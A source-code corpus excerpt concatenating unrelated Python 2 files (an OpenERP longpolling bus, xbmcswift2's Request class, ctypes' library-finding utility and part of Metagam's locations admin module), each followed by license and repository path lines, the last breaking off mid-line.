(json_dump(list(channels)),)) def sendone(self, cr, uid, channel, message): self.sendmany(cr, uid, [[channel, message]]) def poll(self, cr, uid, channels, last=0): # first poll return the notification in the 'buffer' if last == 0: timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT) domain = [('create_date', '>', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))] else: # else returns the unread notifications domain = [('id','>',last)] channels = [json_dump(c) for c in channels] domain.append(('channel','in',channels)) notifications = self.search_read(cr, openerp.SUPERUSER_ID, domain) return [{"id":notif["id"], "channel": simplejson.loads(notif["channel"]), "message":simplejson.loads(notif["message"])} for notif in notifications] class ImDispatch(object): def __init__(self): self.channels = {} def poll(self, dbname, channels, last, timeout=TIMEOUT): # Dont hang ctrl-c for a poll request, we need to bypass private # attribute access because we dont know before starting the thread that # it will handle a longpolling request if not openerp.evented: current = threading.current_thread() current._Thread__daemonic = True # rename the thread to avoid tests waiting for a longpolling current.setName("openerp.longpolling.request.%s" % current.ident) registry = openerp.registry(dbname) # immediatly returns if past notifications exist with registry.cursor() as cr: notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last) # or wait for future ones if not notifications: event = self.Event() for c in channels: self.channels.setdefault(hashable(c), []).append(event) try: event.wait(timeout=timeout) with registry.cursor() as cr: notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last) except Exception: # timeout pass return notifications def loop(self): """ Dispatch postgres notifications to the relevant polling threads/greenlets """ _logger.info("Bus.loop listen imbus on db postgres") with openerp.sql_db.db_connect('postgres').cursor() as cr: conn = cr._cnx cr.execute("listen imbus") cr.commit(); while True: if select.select([conn], [], [], TIMEOUT) == ([],[],[]): pass else: conn.poll() channels = [] while conn.notifies: channels.extend(json.loads(conn.notifies.pop().payload)) # dispatch to local threads/greenlets events = set() for c in channels: events.update(self.channels.pop(hashable(c),[])) for e in events: e.set() def run(self): while True: try: self.loop() except Exception, e: _logger.exception("Bus.loop error, sleep and retry") time.sleep(TIMEOUT) def start(self): if openerp.evented: # gevent mode import gevent self.Event = gevent.event.Event gevent.spawn(self.run) elif openerp.multi_process: # disabled in prefork mode return else: # threaded mode self.Event = threading.Event t = threading.Thread(name="%s.Bus" % __name__, target=self.run) t.daemon = True t.start() return self dispatch = ImDispatch().start() #---------------------------------------------------------- # Controller #---------------------------------------------------------- class Controller(openerp.http.Controller): """ Examples: openerp.jsonRpc('/longpolling/poll','call',{"channels":["c1"],last:0}).then(function(r){console.log(r)}); openerp.jsonRpc('/longpolling/send','call',{"channel":"c1","message":"m1"}); openerp.jsonRpc('/longpolling/send','call',{"channel":"c2","message":"m2"}); """ @openerp.http.route('/longpolling/send', type="json", auth="public") def send(self, channel, message): if not isinstance(channel, basestring): raise Exception("bus.Bus only string channels are allowed.") registry, cr, uid, context = request.registry, request.cr, request.session.uid, request.context return registry['bus.bus'].sendone(cr, uid, channel, message) # override to add channels def _poll(self, dbname, channels, last, options): request.cr.close() request._cr = None return dispatch.poll(dbname, channels, last) @openerp.http.route('/longpolling/poll', type="json", auth="public") def poll(self, channels, last, options=None): if options is None: options = {} if not dispatch: raise Exception("bus.Bus unavailable") if [c for c in channels if not isinstance(c, basestring)]: print channels raise Exception("bus.Bus only string channels are allowed.") return self._poll(request.db, channels, last, options) # vim:et:
agpl-3.0
Mafarricos/Mafarricos-modded-xbmc-addons
plugin.video.streamajoker/resources/site-packages/xbmcswift2/request.py
34
1433
''' xbmcswift2.request ------------------ This module contains the Request class. This class represents an incoming request from XBMC. :copyright: (c) 2012 by Jonathan Beluch :license: GPLv3, see LICENSE for more details. ''' from xbmcswift2.common import unpickle_args import urlparse try: from urlparse import parse_qs except ImportError: from cgi import parse_qs class Request(object): '''The request objects contains all the arguments passed to the plugin via the command line. :param url: The complete plugin URL being requested. Since XBMC typically passes the URL query string in a separate argument from the base URL, they must be joined into a single string before being provided. :param handle: The handle associated with the current request. ''' def __init__(self, url, handle): #: The entire request url. self.url = url #: The current request's handle, an integer. self.handle = int(handle) # urlparse doesn't like the 'plugin' scheme, so pass a protocol # relative url, e.g. //plugin.video.helloxbmc/path self.scheme, remainder = url.split(':', 1) parts = urlparse.urlparse(remainder) self.netloc, self.path, self.query_string = ( parts[1], parts[2], parts[4]) self.args = unpickle_args(parse_qs(self.query_string))
gpl-2.0
tinkerinestudio/Tinkerine-Suite
TinkerineSuite/pypy/lib-python/2.7/ctypes/util.py
2
9030
###################################################################### # This file should be kept compatible with Python 2.3, see PEP 291. # ###################################################################### import sys, os # find_library(name) returns the pathname of a library, or None. if os.name == "nt": def _get_build_version(): """Return the version of MSVC that was used to build Python. For Python 2.3 and up, the version number is included in sys.version. For earlier versions, assume the compiler is MSVC 6. """ # This function was copied from Lib/distutils/msvccompiler.py prefix = "MSC v." i = sys.version.find(prefix) if i == -1: return 6 i = i + len(prefix) s, rest = sys.version[i:].split(" ", 1) majorVersion = int(s[:-2]) - 6 minorVersion = int(s[2:3]) / 10.0 # I don't think paths are affected by minor version in version 6 if majorVersion == 6: minorVersion = 0 if majorVersion >= 6: return majorVersion + minorVersion # else we don't know what version of the compiler this is return None def find_msvcrt(): """Return the name of the VC runtime dll""" version = _get_build_version() if version is None: # better be safe than sorry return None if version <= 6: clibname = 'msvcrt' else: clibname = 'msvcr%d' % (version * 10) # If python was built with in debug mode import imp if imp.get_suffixes()[0][0] == '_d.pyd': clibname += 'd' return clibname+'.dll' def find_library(name): if name in ('c', 'm'): return find_msvcrt() # See MSDN for the REAL search order. for directory in os.environ['PATH'].split(os.pathsep): fname = os.path.join(directory, name) if os.path.isfile(fname): return fname if fname.lower().endswith(".dll"): continue fname = fname + ".dll" if os.path.isfile(fname): return fname return None if os.name == "ce": # search path according to MSDN: # - absolute path specified by filename # - The .exe launch directory # - the Windows directory # - ROM dll files (where are they?) # - OEM specified search path: HKLM\Loader\SystemPath def find_library(name): return name if os.name == "posix" and sys.platform == "darwin": def find_library(name): from ctypes.macholib.dyld import dyld_find as _dyld_find possible = ['lib%s.dylib' % name, '%s.dylib' % name, '%s.framework/%s' % (name, name)] for name in possible: try: return _dyld_find(name) except ValueError: continue return None elif os.name == "posix": # Andreas Degert's find functions, using gcc, /sbin/ldconfig, objdump import re, tempfile, errno def _findLib_gcc(name): expr = r'[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name) fdout, ccout = tempfile.mkstemp() os.close(fdout) cmd = 'if type gcc >/dev/null 2>&1; then CC=gcc; elif type cc >/dev/null 2>&1; then CC=cc;else exit 10; fi;' \ '$CC -Wl,-t -o ' + ccout + ' 2>&1 -l' + name try: f = os.popen(cmd) try: trace = f.read() finally: rv = f.close() finally: try: os.unlink(ccout) except OSError, e: if e.errno != errno.ENOENT: raise if rv == 10: raise OSError, 'gcc or cc command not found' res = re.search(expr, trace) if not res: return None return res.group(0) if sys.platform == "sunos5": # use /usr/ccs/bin/dump on solaris def _get_soname(f): if not f: return None cmd = "/usr/ccs/bin/dump -Lpv 2>/dev/null " + f f = os.popen(cmd) try: data = f.read() finally: f.close() res = re.search(r'\[.*\]\sSONAME\s+([^\s]+)', data) if not res: return None return res.group(1) else: def _get_soname(f): # assuming GNU binutils / ELF if not f: return None cmd = 'if ! type objdump >/dev/null 2>&1; then exit 10; fi;' \ "objdump -p -j .dynamic 2>/dev/null " + f f = os.popen(cmd) dump = f.read() rv = f.close() if rv == 10: raise OSError, 'objdump command not found' f = os.popen(cmd) try: data = f.read() finally: f.close() res = re.search(r'\sSONAME\s+([^\s]+)', data) if not res: return None return res.group(1) if (sys.platform.startswith("freebsd") or sys.platform.startswith("openbsd") or sys.platform.startswith("dragonfly")): def _num_version(libname): # "libxyz.so.MAJOR.MINOR" => [ MAJOR, MINOR ] parts = libname.split(".") nums = [] try: while parts: nums.insert(0, int(parts.pop())) except ValueError: pass return nums or [ sys.maxint ] def find_library(name): ename = re.escape(name) expr = r':-l%s\.\S+ => \S*/(lib%s\.\S+)' % (ename, ename) f = os.popen('/sbin/ldconfig -r 2>/dev/null') try: data = f.read() finally: f.close() res = re.findall(expr, data) if not res: return _get_soname(_findLib_gcc(name)) res.sort(cmp= lambda x,y: cmp(_num_version(x), _num_version(y))) return res[-1] else: def _findLib_ldconfig(name): # XXX assuming GLIBC's ldconfig (with option -p) expr = r'/[^\(\)\s]*lib%s\.[^\(\)\s]*' % re.escape(name) f = os.popen('LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null') try: data = f.read() finally: f.close() res = re.search(expr, data) if not res: # Hm, this works only for libs needed by the python executable. cmd = 'ldd %s 2>/dev/null' % sys.executable f = os.popen(cmd) try: data = f.read() finally: f.close() res = re.search(expr, data) if not res: return None return res.group(0) def _findSoname_ldconfig(name): import struct if struct.calcsize('l') == 4: machine = os.uname()[4] + '-32' else: machine = os.uname()[4] + '-64' mach_map = { 'x86_64-64': 'libc6,x86-64', 'ppc64-64': 'libc6,64bit', 'sparc64-64': 'libc6,64bit', 's390x-64': 'libc6,64bit', 'ia64-64': 'libc6,IA-64', } abi_type = mach_map.get(machine, 'libc6') # XXX assuming GLIBC's ldconfig (with option -p) expr = r'(\S+)\s+\((%s(?:, OS ABI:[^\)]*)?)\)[^/]*(/[^\(\)\s]*lib%s\.[^\(\)\s]*)' \ % (abi_type, re.escape(name)) f = os.popen('/sbin/ldconfig -p 2>/dev/null') try: data = f.read() finally: f.close() res = re.search(expr, data) if not res: return None return res.group(1) def find_library(name): return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name)) ################################################################ # test code def test(): from ctypes import cdll if os.name == "nt": print cdll.msvcrt print cdll.load("msvcrt") print find_library("msvcrt") if os.name == "posix": # find and load_version print find_library("m") print find_library("c") print find_library("bz2") # getattr ## print cdll.m ## print cdll.bz2 # load if sys.platform == "darwin": print cdll.LoadLibrary("libm.dylib") print cdll.LoadLibrary("libcrypto.dylib") print cdll.LoadLibrary("libSystem.dylib") print cdll.LoadLibrary("System.framework/System") else: print cdll.LoadLibrary("libm.so") print cdll.LoadLibrary("libcrypt.so") print find_library("crypt") if __name__ == "__main__": test()
agpl-3.0
JoyTeam/metagam
mg/mmorpg/locations.py
1
66627
#!/usr/bin/python2.6 # This file is a part of Metagam project. # # Metagam is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # Metagam is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Metagam. If not, see <http://www.gnu.org/licenses/>. from mg import * from mg.constructor import * from mg.mmorpg.locations_classes import * import cStringIO from PIL import Image, ImageDraw, ImageEnhance, ImageFont, ImageOps, ImageFilter import re import hashlib from uuid import uuid4 re_polygon_param = re.compile(r'^polygon-(\d+)$') re_multiimage_map = re.compile(r'^([a-f0-9]+)/([a-f0-9]+)$') re_multiimage_map_del = re.compile(r'^([a-f0-9]+)/del/([a-f0-9]+)$') class LocationsAdmin(ConstructorModule): def register(self): self.rhook("permissions.list", self.permissions_list) self.rhook("menu-admin-root.index", self.menu_root_index) self.rhook("menu-admin-locations.index", self.menu_locations_index) self.rhook("ext-admin-locations.editor", self.admin_locations_editor, priv="locations.editor") self.rhook("headmenu-admin-locations.editor", self.headmenu_locations_editor) self.rhook("ext-admin-locations.config", self.admin_locations_config, priv="locations.config") self.rhook("headmenu-admin-locations.config", self.headmenu_locations_config) self.rhook("objclasses.list", self.objclasses_list) self.rhook("admin-interface.progress-bars", self.progress_bars) self.rhook("admin-locations.valid-transitions", self.valid_transitions) self.rhook("admin-locations.update-transitions", self.update_transitions) self.rhook("advice-admin-locations.index", self.advice_locations) self.rhook("auth.user-tables", self.user_tables) self.rhook("ext-admin-locations.teleport", self.admin_locations_teleport, priv="locations.teleport") self.rhook("headmenu-admin-locations.teleport", self.headmenu_locations_teleport) self.rhook("admin-locations.links", self.links) self.rhook("admin-locations.render-links", self.render_links) self.rhook("admin-locations.all", self.locations_all) self.rhook("admin-gameinterface.design-files", self.design_files) def design_files(self, files): files.append({"filename": "location-layout.html", "description": self._("Location page layout"), "doc": "/doc/locations"}) files.append({"filename": "location-arrows.html", "description": self._("Left/right/up/down arrows for the location"), "doc": "/doc/locations"}) files.append({"filename": "location-static.html", "description": self._("Static image location interface"), "doc": "/doc/locations"}) files.append({"filename": "location-multistatic.html", "description": self._("Multiple static images location interface"), "doc": "/doc/locations"}) files.append({"filename": "location-transitions.html", "description": self._("List of transitions in the location"), "doc": "/doc/locations"}) files.append({"filename": "location-canvas.html", "description": self._("HTML5 Canvas location interface"), "doc": "/doc/locations"}) def links(self, location, links): req = self.req() if req.has_access("locations.editor"): links.append({"hook": "locations/editor/%s" % location.uuid, "text": self._("Location"), "order": -10}) def render_links(self, location, links): self.call("admin-locations.links", location, links) if links: req = self.req() uri = req.group if req.hook != "index": uri = "%s/%s" % (uri, req.hook) if req.args: uri = "%s/%s" % (uri, req.args) for l in links: if not l.get("always_href") and ("admin-%s" % l.get("hook") == uri): del l["hook"] links.sort(cmp=lambda x, y: cmp(x.get("order", 0), y.get("order", 0)) or cmp(x.get("text"), y.get("text"))) links[-1]["lst"] = True def headmenu_locations_teleport(self, args): return [self._("Service teleport"), "auth/user-dashboard/%s?active_tab=location" % htmlescape(args)] def admin_locations_teleport(self): req = self.req() character = self.character(req.args) if not character.valid: self.call("web.not_found") # list of locations lst = self.objlist(DBLocationList, query_index="all") lst.load() locations = [(loc.uuid, loc.get("name")) for loc in lst] valid_locations = set([loc.uuid for loc in lst]) # processing request if req.ok(): errors = {} # loc loc = req.param("v_loc") if not loc: errors["v_loc"] = self._("This field is mandatory") elif not loc in valid_locations: errors["v_loc"] = self._("Select a valid location") # errors if errors: self.call("web.response_json_html", {"success": False, "errors": errors}) # teleporting self.call("teleport.character", character, self.location(loc)) character.main_open("/location") self.call("admin.redirect", "auth/user-dashboard/%s?active_tab=location" % character.uuid) # rendering form fields = [ {"name": "loc", "label": self._("Target location"), "type": "combo", "values": locations, "value": character.location.uuid if character.location else None}, ] self.call("admin.form", fields=fields) def advice_locations(self, hook, args, advice): advice.append({"title": self._("Locations documentation"), "content": self._('You can find detailed information on the location system in the <a href="//www.%s/doc/locations" target="_blank">locations page</a> in the reference manual.') % self.main_host}) def objclasses_list(self, objclasses): objclasses["CharacterLocation"] = (DBCharacterLocation, DBCharacterLocationList) objclasses["Location"] = (DBLocation, DBLocationList) objclasses["LocParams"] = (DBLocParams, DBLocParamsList) def child_modules(self): lst = [ "mg.mmorpg.locations.LocationsStaticImages", "mg.mmorpg.locations.LocationsStaticImagesAdmin", "mg.mmorpg.locations.LocationsMultiStaticImages", "mg.mmorpg.locations.LocationsMultiStaticImagesAdmin", "mg.mmorpg.locparams.LocationParams", "mg.mmorpg.locfunctions.LocationFunctions"] return lst def menu_root_index(self, menu): menu.append({"id": "locations.index", "text": self._("Locations"), "order": 20}) def menu_locations_index(self, menu): req = self.req() if req.has_access("locations.config"): menu.append({"id": "locations/config", "text": self._("Locations configuration"), "order": 0, "leaf": True}) menu.append({"id": "locations/editor", "text": self._("Locations editor"), "order": 1, "leaf": True}) def permissions_list(self, perms): perms.append({"id": "locations.editor", "name": self._("Locations editor")}) perms.append({"id": "locations.config", "name": self._("Locations configuration")}) perms.append({"id": "locations.users", "name": self._("Viewing characters locations")}) perms.append({"id": "locations.teleport", "name": self._("Service teleport")}) def user_tables(self, user, tables): req = self.req() if req.has_access("locations.users"): character = self.character(user.uuid) if character.valid: if character.location: location = htmlescape(character.location.name) if req.has_access("locations.editor"): location = u'<hook:admin.link href="locations/editor/%s" title="%s" />' % (character.location.uuid, location) else: location = self._("none") loc_row = [self._("Location"), location] if req.has_access("locations.teleport"): loc_row.append(u'<hook:admin.link href="locations/teleport/%s" title="%s" />' % (character.uuid, self._("teleport the character"))) table = { "type": "location", "title": self._("Location"), "order": 30, "rows": [ loc_row, ] } tables.append(table) def headmenu_locations_editor(self, args): if args == "new": return [self._("New location"), "locations/editor"] elif args: location = self.location(args) if location.valid(): return [location.name, "locations/editor"] else: return [self._("Editor"), "locations/editor"] return self._("Locations") def admin_locations_editor(self): req = self.req() if req.args: if req.args != "new": location = self.location(req.args) if not location.valid(): self.call("web.response_json", {"success": True, "redirect": "locations/editor"}) db_loc = location.db_location else: db_loc = self.obj(DBLocation) lang = self.call("l10n.lang") if req.ok(): self.call("web.upload_handler") errors = {} name = req.param("name") if not name: errors["name"] = self._("Name is mandatory") elif name != htmlescape(name) or name != jsencode(name): errors["name"] = self._("Name contains forbidden symbols") else: db_loc.set("name", name) if lang == "ru": if req.param("name_g"): db_loc.set("name_g", req.param("name_g")) else: db_loc.delkey("name_g") if req.param("name_a"): db_loc.set("name_a", req.param("name_a")) else: db_loc.delkey("name_a") if req.param("name_w"): db_loc.set("name_w", req.param("name_w")) else: db_loc.delkey("name_w") if req.param("name_t"): db_loc.set("name_t", req.param("name_t")) else: db_loc.delkey("name_t") if req.param("name_f"): db_loc.set("name_f", req.param("name_f")) else: db_loc.delkey("name_f") val = req.param("delay") if not valid_nonnegative_int(val): errors["delay"] = self._("Delay must be a non-negative integer value") else: db_loc.set("delay", intz(val)) for dest in ["up", "left", "right", "down", "exit"]: loc = req.param("v_loc_%s" % dest) if loc: loc = self.location(loc) if not loc.valid(): errors["v_loc_%s" % dest] = self._("Invalid location selected") elif loc.uuid == db_loc.uuid: errors["v_loc_%s" % dest] = self._("Link to the same location") else: db_loc.set("loc_%s" % dest, loc.uuid) else: db_loc.delkey("loc_%s" % dest) image_type = req.param("v_image_type") db_loc.set("image_type", image_type) flags = {} if image_type == "none": flags["image_type_valid"] = True self.call("admin-locations.editor-form-validate", db_loc, flags, errors) if not flags.get("image_type_valid"): errors["v_image_type"] = self._("Select valid visualization type") # errors if len(errors): self.call("web.response_json_html", {"success": False, "errors": errors}) # storing self.call("admin-locations.editor-form-store", db_loc, flags) self.call("admin-locations.update-transitions", db_loc) transitions = db_loc.get("transitions", {}) char = self.character(req.user()) for loc_id, info in transitions.iteritems(): info["show-trans"] = True if req.param("tr-%s-show-trans" % loc_id) else False info["hint"] = req.param("tr-%s-hint" % loc_id).strip() val = req.param("tr-%s-delay" % loc_id).strip() info["delay"] = intz(val) if val != "" else None info["available"] = self.call("script.admin-expression", "tr-%s-available" % loc_id, errors, globs={"char": char}) if req.param("tr-%s-available" % loc_id) != "" else 1 info["error"] = self.call("script.admin-text", "tr-%s-error" % loc_id, errors, globs={"char": char}) db_loc.store() self.call("admin-locations.editor-form-cleanup", db_loc, flags) self.call("web.response_json_html", {"success": True, "redirect": "locations/editor/%s" % db_loc.uuid, "parameters": {"saved": 1}}) # rendering form fields = [] fields.append({"name": "name", "value": db_loc.get("name"), "label": self._("Location name")}) if lang == "ru": fields.append({"name": "name_g", "value": db_loc.get("name_g"), "label": self._("Location name in genitive")}) fields.append({"name": "name_a", "value": db_loc.get("name_a"), "label": self._("Location name in accusative"), "inline": True}) fields.append({"name": "name_w", "value": db_loc.get("name_w"), "label": self._("Location name (where?) - 'in the Some Location'")}) fields.append({"name": "name_t", "value": db_loc.get("name_t"), "label": self._("Location name (to where?) - 'to the Some Location'"), "inline": True}) fields.append({"name": "name_f", "value": db_loc.get("name_f"), "label": self._("Location name (from where?) - 'from the Some Location'"), "inline": True}) # timing fields.append({"name": "delay", "label": self._("Delay when moving to this location and from it"), "value": db_loc.get("delay", default_location_delay)}) # left/right/up/down navigation lst = self.objlist(DBLocationList, query_index="all") lst.load() locations = [(loc.uuid, loc.get("name")) for loc in lst if loc.uuid != db_loc.uuid] locations.insert(0, ("", "---------------")) fields.append({"name": "loc_up", "label": self._("Location to the up"), "type": "combo", "values": locations, "value": db_loc.get("loc_up", "")}) fields.append({"name": "loc_left", "label": self._("Location to the left"), "type": "combo", "values": locations, "value": db_loc.get("loc_left", "")}) fields.append({"name": "loc_right", "label": self._("Location to the right"), "type": "combo", "values": locations, "value": db_loc.get("loc_right", ""), "inline": True}) fields.append({"name": "loc_down", "label": self._("Location to the down"), "type": "combo", "values": locations, "value": db_loc.get("loc_down", "")}) fields.append({"name": "loc_exit", "label": self._("This location has 'Exit' direction pointing to this location"), "type": "combo", "values": locations, "value": db_loc.get("loc_exit", "")}) # image type image_types = [] image_types.append(("none", self._("No image"))) image_type = {"name": "image_type", "type": "combo", "value": db_loc.get("image_type", "none"), "label": self._("Visualization type"), "values": image_types} fields.append(image_type) self.call("admin-locations.editor-form-render", db_loc, fields) if not db_loc.get("image_type") and image_type["values"] and not image_type["value"]: image_type["value"] = image_type["values"][0][0] menu = None # rendering location preview if req.args != "new": menu = [] self.call("admin-locations.render-links", location, menu) # location preview self.call("admin-locations.render", location, fields) # transitions for loc_id, info in db_loc.get("transitions", {}).iteritems(): loc = self.location(loc_id) if not loc.valid(): continue fields.append({"type": "header", "html": '%s: %s' % (self._("Transition"), loc.name_t)}) fields.append({"name": "tr-%s-show-trans" % loc_id, "type": "checkbox", "label": self._("Show this location in the text list of transitions"), "checked": info.get("show-trans", True)}) fields.append({"name": "tr-%s-hint" % loc_id, "label": self._("Hint when mouse over the link"), "value": info.get("hint")}) fields.append({"name": "tr-%s-available" % loc_id, "label": self._("Transition is available for the character") + self.call("script.help-icon-expressions"), "value": self.call("script.unparse-expression", info.get("available", 1))}) fields.append({"name": "tr-%s-error" % loc_id, "label": self._("Error message when transition is unavailable") + self.call("script.help-icon-expressions"), "value": self.call("script.unparse-text", info.get("error", "")), "inline": True}) fields.append({"name": "tr-%s-delay" % loc_id, "label": self._("Delay when moving to this location (if not specified delay will be calculated as sum of delays on both locations)"), "value": info.get("delay")}) self.call("admin.form", fields=fields, modules=["FileUploadField"], menu=menu) rows = [] locations = [] lst = self.objlist(DBLocationList, query_index="all") lst.load() for db_loc in lst: row = [ u'<strong>%s</strong><br />%s' % (htmlescape(db_loc.get("name")), db_loc.uuid), None, '<hook:admin.link href="locations/editor/%s" title="%s" />' % (db_loc.uuid, self._("edit")), ] rows.append(row) locations.append({ "db_loc": db_loc, "row": row }) table = { "links": [ { "hook": "locations/editor/new", "text": self._("New location"), "lst": True, } ], "header": [ self._("Location"), self._("Functions"), self._("Editing"), ], "rows": rows, } self.call("admin-locations.format-list", locations, table) vars = { "tables": [table] } self.call("admin.response_template", "admin/common/tables.html", vars) def locations_all(self): lst = self.objlist(DBLocationList, query_index="all") lst.load() return [(db_loc.uuid, db_loc.get("name")) for db_loc in lst] def headmenu_locations_config(self, args): return self._("Locations configuration") def admin_locations_config(self): req = self.req() if req.ok(): errors = {} config = self.app().config_updater() start_location = req.param("v_start_location") movement_delay = req.param("movement_delay") if start_location: loc = self.location(start_location) if not loc.valid(): errors["v_start_location"] = self._("Invalid starting location") config.set("locations.startloc", start_location) char = self.character(req.user()) config.set("locations.movement-delay", self.call("script.admin-expression", "movement_delay", errors, globs={"char": char, "base_delay": 1}, require_glob=["base_delay"])) if len(errors): self.call("web.response_json", {"success": False, "errors": errors}) config.store() self.call("admin.response", self._("Settings stored"), {}) locations = self.call("admin-locations.all") fields = [ {"name": "start_location", "label": self._("Starting location for the new character"), "type": "combo", "value": self.conf("locations.startloc"), "values": locations}, {"name": "movement_delay", "label": '%s%s' % (self._("Location movement delay expression"), self.call("script.help-icon-expressions")), "value": self.call("script.unparse-expression", self.call("locations.movement_delay"))}, ] self.call("admin.form", fields=fields) def progress_bars(self, bars): bars.append({"code": "location-movement", "description": self._("Delay when moving between locations")}) def valid_transitions(self, db_loc, valid_transitions): for dest in ["up", "left", "right", "down", "exit"]: loc = db_loc.get("loc_%s" % dest) if loc: valid_transitions.add(loc) def update_transitions(self, db_loc): transitions = db_loc.get("transitions", {}) db_loc.set("transitions", transitions) valid_transitions = set() self.call("admin-locations.valid-transitions", db_loc, valid_transitions) for loc in transitions.keys(): if loc not in valid_transitions: del transitions[loc] for loc in valid_transitions: if loc not in transitions: transitions[loc] = {} db_loc.touch() class Locations(ConstructorModule): def register(self): self.rhook("locations.character_get", self.get) self.rhook("locations.character_before_set", self.before_set) self.rhook("locations.character_set", self.lset) self.rhook("locations.character_after_set", self.after_set) self.rhook("locfunctions.list", self.locfunctions_list) self.rhook("ext-location.show", self.ext_location_show, priv="logged") self.rhook("gameinterface.render", self.gameinterface_render) self.rhook("ext-location.move", self.ext_move, priv="logged") self.rhook("gameinterface.buttons", self.gameinterface_buttons) self.rhook("hook-location.arrows", self.hook_arrows) self.rhook("hook-location.transitions", self.hook_transitions) self.rhook("hook-location.name", self.hook_name) self.rhook("paidservices.available", self.paid_services_available) self.rhook("paidservices.fastmove", self.srv_fastmove) self.rhook("money-description.fastmove", self.money_description_fastmove) self.rhook("locations.movement_delay", self.movement_delay) self.rhook("location.info", self.location_info) self.rhook("teleport.character", self.teleport_character) self.rhook("hook-location.image", self.hook_image) def hook_image(self, vars): if not vars.get("load_extjs"): vars["load_extjs"] = {} vars["load_extjs"]["qtips"] = True try: location = self.location(vars["location"]["id"]) except KeyError: pass else: return self.call("locations.render", location, vars) def location_info(self, loc_id): location = self.location(loc_id) if location.valid(): return location else: return None def get(self, character): try: info = self.obj(DBCharacterLocation, character.uuid) except ObjectNotFoundException: start_location = self.conf("locations.startloc") if start_location: info = self.obj(DBCharacterLocation, character.uuid, data={}) info.set("location", start_location) info.store() loc = self.location(start_location) self.after_set(character, loc, None) delay = None instance = None else: loc = None instance = None delay = None else: loc = self.location(info.get("location")) instance = info.get("instance") delay = info.get("delay") return [loc, instance, delay] def before_set(self, character, new_location, instance): self.call("chat.channel-unjoin", character, self.call("chat.channel-info", "loc")) def lset(self, character, new_location, instance, delay): info = self.obj(DBCharacterLocation, character.uuid) info.set("location", new_location.uuid) if instance is None: info.delkey("instance") else: info.set("instance", instance) if delay is None: info.delkey("delay") else: info.set("delay", delay) info.store() def after_set(self, character, old_location, instance): self.call("chat.channel-join", character, self.call("chat.channel-info", "loc")) def locfunctions_list(self, location, funcs): loc_exit = location.db_location.get("loc_exit") if loc_exit: funcs.append({ "id": "exit", "order": -20, "title": self._("Exit"), "available": 1, "onclick": "parent.Locations.move('%s')" % loc_exit, }) funcs.append({ "id": "show", "order": -10, "title": self._("Location"), "available": 1, }) def ext_location_show(self): self.call("quest.check-dialogs") req = self.req() character = self.character(req.user()) location = character.location if location is None: self.call("game.internal-error", self._("Character is outside of any locations")) vars = { "loc": ScriptTemplateObject(location), "location": { "id": location.uuid, }, "update_script": None if req.param("noupdate") else self.update_js(character), "debug_ext": self.conf("debug.ext"), "loc_modules": set(["parent", "hints", "location"]), } self.call("game.add_common_vars", vars) transitions = [] for loc_id, info in location.transitions.iteritems(): transitions.append({ "loc": loc_id, "hint": jsencode(info.get("hint")) }) vars["transitions"] = transitions design = self.design("gameinterface") self.call("locfunctions.menu", character, vars) self.call("location.render", character, location, vars) html = self.call("design.parse", design, "location-layout.html", None, vars) vars["loc_modules"] = [{"name": mod} for mod in vars["loc_modules"]] if len(vars["loc_modules"]): vars["loc_modules"][-1]["lst"] = True self.call("game.response_internal", "location.html", vars, html) def update_js(self, character): now = self.now() commands = [] # updating location movement progress bar if character.location_delay is None or now >= character.location_delay[1]: commands.append("Game.progress_set('location-movement', 1);") else: now = unix_timestamp(now) start = unix_timestamp(character.location_delay[0]) end = unix_timestamp(character.location_delay[1]) current_ratio = (now - start) * 1.0 / (end - start) time_end = end * 1000.0 commands.append("Game.progress_run('location-movement', (Game.now() - {start}) / {ratio}, 1, {end} - Game.now());".format(start=start * 1000.0, ratio=(end - start) * 1000.0, end=time_end)) # updating location names if character.location: commands.append(u"Locations.update('{name}', '{name_w}');".format( name=jsencode(character.location.name), name_w=jsencode(character.location.name_w) )) return ''.join(commands) def gameinterface_render(self, character, vars, design): vars["js_modules"].add("locations") vars["js_init"].append(self.update_js(character)) def ext_move(self): self.call("quest.check-dialogs") req = self.req() character = self.character(req.user()) with self.lock([character.lock, "session.%s" % req.session().uuid]): if not character.tech_online: self.call("web.response_json", {"ok": False, "error": self._("Character offline")}) if character.location_delay and character.location_delay[1] > self.now(): self.call("web.response_json", {"ok": False, "error": self._("You are moving already"), "hide_title": True}) if character.busy: self.call("web.response_json", {"ok": False, "error": self._("You are busy and cannot move"), "hide_title": True}) old_location = character.location new_location_id = req.param("location") # validating transition trans = old_location.transitions.get(new_location_id) if trans is None: self.call("web.response_json", {"ok": False, "error": self._("No way")}) new_location = self.location(new_location_id) if not new_location.valid(): self.call("web.response_json", {"ok": False, "error": self._("No such location")}) delay = trans.get("delay") if delay is None: delay = old_location.delay + new_location.delay # evaluating availability available = self.call("script.evaluate-expression", trans.get("available", 1), globs={"char": character}, description=self._("Availability of transition between locations")) if not available: error = self.call("script.evaluate-text", trans.get("error", ""), globs={"char": character}, description=self._("Transition error message")) self.call("web.response_json", {"ok": False, "error": error, "hide_title": True}) # evaluating delay delay = self.call("script.evaluate-expression", self.movement_delay(), {"char": character, "base_delay": delay}, description=self._("Location movement delay")) character.set_location(new_location, character.instance, [self.now(), self.now(delay)]) self.call("web.response_json", { "ok": True, "id": character.location.uuid, "update_script": self.update_js(character), }) def teleport_character(self, character, location, instance=None, delay=None): character.set_location(location=location, instance=instance, delay=delay) character.javascript(self.update_js(character)) def gameinterface_buttons(self, buttons): buttons.append({ "id": "location", "href": "/location", "target": "main", "icon": "location.png", "title": self._("Location"), "block": "left-menu", "order": 3, }) def hook_arrows(self, vars): req = self.req() character = self.character(req.user()) location = character.location design = self.design("gameinterface") arrows = {} for dest in ["up", "down", "left", "right", "exit"]: loc_id = location.db_location.get("loc_%s" % dest) if loc_id: arrows["img_%s" % dest] = "%s/location-%s.png" % (design.get("uri"), dest) if design and 